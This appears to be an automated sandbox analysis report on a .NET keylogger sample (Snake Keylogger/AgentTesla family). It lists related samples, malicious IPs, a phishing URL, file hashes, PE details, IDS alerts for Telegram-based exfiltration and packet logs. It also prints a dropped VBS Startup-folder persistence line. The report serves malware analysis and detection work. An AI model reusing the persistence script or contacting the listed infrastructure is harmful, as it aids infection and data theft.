                                                                                                                                                                    oybsEA5EhR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    TpHHp3vAuM.exeGet hashmaliciousCryptOne, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    faz3VkyT7b.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    bddTkmucZP.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    ctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    NifDAK5eSH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    gID5oMWjq1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220

                                                                                                                                                                    ASNs

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    TELEGRAMRUfw5476UX6g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    C7fclY8IiM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    oybsEA5EhR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    TpHHp3vAuM.exeGet hashmaliciousCryptOne, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    faz3VkyT7b.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    bddTkmucZP.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    ctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    NifDAK5eSH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    gID5oMWjq1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    ASLAGIDKOM-NETUAG3uJOLisBq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    yxoY9FvULu.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    ShGhJDcXXI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    wpo28029 Changzhou Tairun.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    gcXBQbWQ1p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    AmEZrFh7we.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    3SgC5vaFEg.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    SecuriteInfo.com.Win32.CrypterX-gen.27605.29739.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    PO 352995.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    Ningbo Overdue Invoice - JAN 23,2025.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 46.175.148.58
                                                                                                                                                                    ORACLE-BMC-31898UShcy2SdW2z6.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 193.122.6.168
                                                                                                                                                                    C7fclY8IiM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 193.122.6.168
                                                                                                                                                                    oybsEA5EhR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 193.122.6.168
                                                                                                                                                                    faz3VkyT7b.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                    • 193.122.130.0
                                                                                                                                                                    REQ. NO.237.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 193.122.6.168
                                                                                                                                                                    bddTkmucZP.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    ctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    ZX0sNnKlqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                    • 193.122.130.0
                                                                                                                                                                    gC0avSHWrd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 193.122.130.0
                                                                                                                                                                    CLOUDFLARENETUShcy2SdW2z6.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                    fw5476UX6g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 104.21.64.1
                                                                                                                                                                    C7fclY8IiM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 104.21.112.1
                                                                                                                                                                    oybsEA5EhR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 104.21.48.1
                                                                                                                                                                    TpHHp3vAuM.exeGet hashmaliciousCryptOne, Snake KeyloggerBrowse
                                                                                                                                                                    • 104.21.32.1
                                                                                                                                                                    y27AF4qx0Q.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 104.26.13.205
                                                                                                                                                                    https://vuqdis5yetjpyqu38qzukbhmzmdn.pil.com.tr/newmoonsed/activitypery/loufewagophy/?email=script_kiddys@tryharder.comGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                                                                                                    • 104.18.95.41
                                                                                                                                                                    f468369488.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                    faz3VkyT7b.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                    • 104.21.64.1
                                                                                                                                                                    REQ. NO.237.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 104.21.96.1

                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adhcy2SdW2z6.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                    fw5476UX6g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                    C7fclY8IiM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                    oybsEA5EhR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                    TpHHp3vAuM.exeGet hashmaliciousCryptOne, Snake KeyloggerBrowse
                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                    faz3VkyT7b.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                    REQ. NO.237.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                    bddTkmucZP.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                    ctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                    ZX0sNnKlqT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                    • 104.21.96.1
                                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0efw5476UX6g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    C7fclY8IiM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    oybsEA5EhR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    TpHHp3vAuM.exeGet hashmaliciousCryptOne, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    y27AF4qx0Q.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    faz3VkyT7b.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    bddTkmucZP.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    ctTrvHxBXO.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    nPqeSjgAQQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    bc7hwStvUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220

                                                                                                                                                                    Dropped Files

                                                                                                                                                                    No context

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\pbgjw8i8N7.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):83
                                                                                                                                                                    Entropy (8bit):4.8540896607743065
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:FER/n0eFHHoUkh4EaKC54xkAJHn:FER/lFHI9aZ54xkQ
                                                                                                                                                                    MD5:061D0A86AEDA15C377568F4B29BBAF18
                                                                                                                                                                    SHA1:837000CED0C724D9D9E4435B8DEC8F9D9D66DE0D
                                                                                                                                                                    SHA-256:E07469C6D38C6555ECA0663828E9AE9096CB6F2DCD4AF5005B1A5BFFF2BAAE51
                                                                                                                                                                    SHA-512:F527B876A4BE2E0EFED2385FA4C19CC58729A95E39C5AC32A09B014FA5EB1233EFC467655DAE802245440FD99A80873F1B385694A67B09FB7E909CE9070A15AA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\XsdType.exe"""

                                                                                                                                                                    C:\Users\user\AppData\Roaming\XsdType.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\pbgjw8i8N7.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2034176
                                                                                                                                                                    Entropy (8bit):7.188926297239984
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:SUeQg2PvNPjxiF1LeVFJ03GDJuwAP3OED/NSq66+0wZPK8FbqFnAYJytaEVarmmI:tNrxiHUJK8lAP3vD/A0uC8tBcytaeXd
                                                                                                                                                                    MD5:679DA76A671452DE2F13A1585028E74E
                                                                                                                                                                    SHA1:E89C5B5D3B31025710714C14955D22820E2ED493
                                                                                                                                                                    SHA-256:44095F79A9E682A29ED75FAB33F6DCF1E2F11937097E4C7E3F84080FF7444048
                                                                                                                                                                    SHA-512:E21D43F7BBFD77CE1FDCCF438655385EE1EFD026F29ADBA0C1E979186DE0B28B8495C97ED4E89B9324D484B0DB4CE9C9E5D29964D4DF395BE54F6477D086959C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 70%, Browse
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<U.g................................. ... ....@.. .......................`............`.................................P...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........b..xz..........L....@...........................................*...(....*..0..]....... ........8........E....=.......88...(....r...p(....rM..p(.... ....~....{....9....& ....8....*...&~.......*...~....*..(....*..0..C....... ........8........E....2...%...C.......e...........8-.... ....~....{....:....& ....8....... ....8......9.... ....8....... ....~....{....9....& ....8z....(...... ....~....{....:....& ....8........E............l...A...8....s...... ....8....ra..p(....

                                                                                                                                                                    C:\Users\user\AppData\Roaming\XsdType.exe:Zone.Identifier

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\pbgjw8i8N7.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.188926297239984
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                    File name:pbgjw8i8N7.exe
                                                                                                                                                                    File size:2'034'176 bytes
                                                                                                                                                                    MD5:679da76a671452de2f13a1585028e74e
                                                                                                                                                                    SHA1:e89c5b5d3b31025710714c14955d22820e2ed493
                                                                                                                                                                    SHA256:44095f79a9e682a29ed75fab33f6dcf1e2f11937097e4c7e3f84080ff7444048
                                                                                                                                                                    SHA512:e21d43f7bbfd77ce1fdccf438655385ee1efd026f29adba0c1e979186de0b28b8495c97ed4e89b9324d484b0db4ce9c9e5d29964d4df395be54f6477d086959c
                                                                                                                                                                    SSDEEP:24576:SUeQg2PvNPjxiF1LeVFJ03GDJuwAP3OED/NSq66+0wZPK8FbqFnAYJytaEVarmmI:tNrxiHUJK8lAP3vD/A0uC8tBcytaeXd
                                                                                                                                                                    TLSH:2A957D0BF79A47A1D274573EC8AB081CA3A4E58267D3DF1E374A235908E37BB8D41617
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<U.g................................. ... ....@.. .......................`............`................................

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                                                                                    Static PE Info

                                                                                                                                                                    General

                                                                                                                                                                    Entrypoint:0x5f1e9e
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0x67B7553C [Thu Feb 20 16:15:56 2025 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:4
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                    Instruction
                                                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al

                                                                                                                                                                    Data Directories

                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1f1e500x4b.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1f20000x598.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1f40000xc.reloc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                    Sections

                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .text0x20000x1efea40x1f0000d03b9bac6ae442dab3dbcb8283e6b212False0.7072488107988911data7.19209181797832IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rsrc0x1f20000x5980x600a728d9befd81068fd0b723357e4d78c7False0.4147135416666667data4.067971838205649IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .reloc0x1f40000xc0x200076cee7609f3daeac8d8b0882acc6e9fFalse0.044921875MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\037"0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                    Resources

                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                    RT_VERSION0x1f20a00x30cdata0.4256410256410256
                                                                                                                                                                    RT_MANIFEST0x1f23ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                    Imports

                                                                                                                                                                    DLLImport
                                                                                                                                                                    mscoree.dll_CorExeMain

                                                                                                                                                                    Version Infos

                                                                                                                                                                    DescriptionData
                                                                                                                                                                    Translation0x0000 0x04b0
                                                                                                                                                                    Comments
                                                                                                                                                                    CompanyName
                                                                                                                                                                    FileDescriptionJurfzqn
                                                                                                                                                                    FileVersion1.0.0.0
                                                                                                                                                                    InternalNameJurfzqn.exe
                                                                                                                                                                    LegalCopyrightCopyright 2017
                                                                                                                                                                    LegalTrademarks
                                                                                                                                                                    OriginalFilenameJurfzqn.exe
                                                                                                                                                                    ProductNameJurfzqn
                                                                                                                                                                    ProductVersion1.0.0.0
                                                                                                                                                                    Assembly Version1.0.0.0

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                    2025-03-11T06:09:59.024815+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549712158.101.44.24280TCP
                                                                                                                                                                    2025-03-11T06:10:04.872621+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549712158.101.44.24280TCP
                                                                                                                                                                    2025-03-11T06:10:07.153657+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549714104.21.96.1443TCP
                                                                                                                                                                    2025-03-11T06:10:16.717744+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549715158.101.44.24280TCP
                                                                                                                                                                    2025-03-11T06:10:18.915468+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549719104.21.96.1443TCP
                                                                                                                                                                    2025-03-11T06:10:24.107212+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549716158.101.44.24280TCP
                                                                                                                                                                    2025-03-11T06:10:27.857004+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549716158.101.44.24280TCP
                                                                                                                                                                    2025-03-11T06:10:30.004518+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549726104.21.96.1443TCP
                                                                                                                                                                    2025-03-11T06:10:30.716397+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549728158.101.44.24280TCP
                                                                                                                                                                    2025-03-11T06:10:34.050375+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549729104.21.96.1443TCP
                                                                                                                                                                    2025-03-11T06:10:45.740940+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.549745149.154.167.220443TCP
                                                                                                                                                                    2025-03-11T06:10:49.188792+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549748104.21.96.1443TCP
                                                                                                                                                                    2025-03-11T06:10:52.152063+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549750104.21.96.1443TCP
                                                                                                                                                                    2025-03-11T06:10:54.564569+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.549753149.154.167.220443TCP

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Mar 11, 2025 06:09:58.196594000 CET4971280192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:09:58.201539040 CET8049712158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:09:58.201631069 CET4971280192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:09:58.201845884 CET4971280192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:09:58.206703901 CET8049712158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:09:58.804289103 CET8049712158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:09:58.809731007 CET4971280192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:09:58.814605951 CET8049712158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:09:58.969089031 CET8049712158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:09:59.024815083 CET4971280192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:09:59.184804916 CET49713443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:09:59.184845924 CET44349713104.21.96.1192.168.2.5
